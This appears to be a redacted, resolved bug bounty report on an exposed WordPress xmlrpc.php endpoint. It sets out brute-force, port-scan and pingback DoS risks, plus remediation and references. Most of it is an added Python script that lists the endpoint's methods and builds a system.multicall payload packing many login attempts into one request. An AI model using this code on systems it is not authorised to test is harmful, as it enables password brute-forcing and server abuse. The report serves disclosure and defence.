xmlrpc.php is enabled, which allows an attacker to perform XSPA, brute-force and even denial-of-service (DoS) attacks via https://████/xmlrpc.php
Medium
Vulnerability Details
##Summary:
Hello team,
I have found a security vulnerability in https://███████/xmlrpc.php which lets an attacker perform:
1: XSPA or port scan
2: Brute force
3: DoS and much more
Step-by-step Reproduction Instructions
█████████
1: Go to https://██████/xmlrpc.php to check whether it is enabled. A live WordPress XML-RPC endpoint answers a plain GET with the text "XML-RPC server accepts POST requests only."; a disabled or blocked endpoint returns an error page (typically 403 or 404) instead.
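As an added example (not code from the report, the references, or WordPress itself), the check in step 1 can be carried further by asking the endpoint which methods it exposes and mapping them to the three findings above. The method names and the GET banner are WordPress's own; the target URL, the sample response and the sample credential list are constructed here for illustration, and the only function that touches the network (`probe`) is never called by the offline checks.

```python
"""Check a WordPress xmlrpc.php endpoint for the exposures named in the report.

Added example, not the report's or WordPress's code. The method names below are
the standard WordPress XML-RPC methods; everything else (URL, sample response,
candidate passwords) is constructed for illustration.
"""
import xmlrpc.client
from urllib.request import Request, urlopen

# What WordPress returns to a plain GET when the endpoint is live (step 1).
ENABLED_BANNER = "XML-RPC server accepts POST requests only."

# Methods whose presence maps to a finding in the report.
RISK_METHODS = {
    "pingback.ping": "XSPA / port scan or DoS: the server fetches an attacker-chosen URL",
    "system.multicall": "brute-force amplification: many login attempts in one HTTP request",
    "wp.getUsersBlogs": "authenticated method usable as a password oracle",
}


def is_enabled_banner(get_body: str) -> bool:
    """Step 1: does the GET response carry the WordPress XML-RPC banner?"""
    return ENABLED_BANNER in get_body


def build_list_methods_request() -> bytes:
    """XML-RPC call that asks the server to enumerate its methods."""
    return xmlrpc.client.dumps((), methodname="system.listMethods").encode()


def parse_list_methods_response(body: bytes) -> list:
    """Return the method names from a system.listMethods response."""
    params, _method = xmlrpc.client.loads(body)
    return list(params[0])


def assess(methods) -> dict:
    """Map exposed methods to the findings they enable."""
    return {m: RISK_METHODS[m] for m in methods if m in RISK_METHODS}


def build_multicall_login(username: str, passwords) -> bytes:
    """One system.multicall request that wraps many wp.getUsersBlogs logins.

    This is the payload shape behind the report's brute-force finding: a
    single HTTP request carries len(passwords) credential checks.
    """
    calls = [
        {"methodName": "wp.getUsersBlogs", "params": [username, pw]}
        for pw in passwords
    ]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall").encode()


def count_attempts_in_multicall(body: bytes) -> int:
    """How many credential checks a multicall body carries (defender's view)."""
    params, method = xmlrpc.client.loads(body)
    if method != "system.multicall":
        return 0
    return len(params[0])


def probe(url: str, timeout: float = 10.0) -> dict:
    """Live check: POST system.listMethods to the endpoint and assess it.

    Not run by the offline checks below; use only against hosts you are
    authorised to test.
    """
    req = Request(url, data=build_list_methods_request(),
                  headers={"Content-Type": "text/xml"})
    with urlopen(req, timeout=timeout) as resp:
        return assess(parse_list_methods_response(resp.read()))


# Constructed sample of what a stock WordPress install answers (abridged).
SAMPLE_RESPONSE = xmlrpc.client.dumps(
    (["system.multicall", "system.listMethods", "pingback.ping",
      "wp.getUsersBlogs", "wp.getPosts"],),
    methodresponse=True,
).encode()


if __name__ == "__main__":
    print("banner check:", is_enabled_banner(ENABLED_BANNER))
    for method, why in assess(parse_list_methods_response(SAMPLE_RESPONSE)).items():
        print(f"{method}: {why}")
    payload = build_multicall_login("admin", ["password", "admin123", "letmein"])
    print("attempts in one request:", count_attempts_in_multicall(payload))
```

One caveat before reading a finding off this script: WordPress 4.4 and later set an internal auth_failed flag on the first wrong password inside a multicall and reject the remaining calls without checking them, so the amplification only yields real speed-up on older installs; a multicall carrying many wp.getUsersBlogs calls is still a high-value detection signal in web server logs either way.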
Remediation:
If the xmlrpc.php file is not being used, it should be disabled and removed completely to avoid any potential risk. Otherwise, it should at the very least be blocked from external access at the web server, or restricted to the methods actually needed (pingback.ping and system.multicall are the two behind the findings above). Note that Jetpack and the WordPress mobile apps still depend on XML-RPC, so confirm nothing legitimate uses the endpoint before blocking it outright.
Reference:
https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
https://medium.com/@protector47/how-to-hack-wordpress-website-via-xmlrpc-php-61c813fa3740
https://hackerone.com/reports/325040
https://hackerone.com/reports/752073
## Impact
This endpoint is also used for brute-force attacks that aim to steal the admin credentials and other important credentials.
The pingback method can be driven from multiple hosts to turn the victim's server into a participant in a mass DDoS attack, or to exhaust its own resources.
Report Stats
- Report ID: 884756
- State: Closed
- Substate: resolved
- Upvotes: 10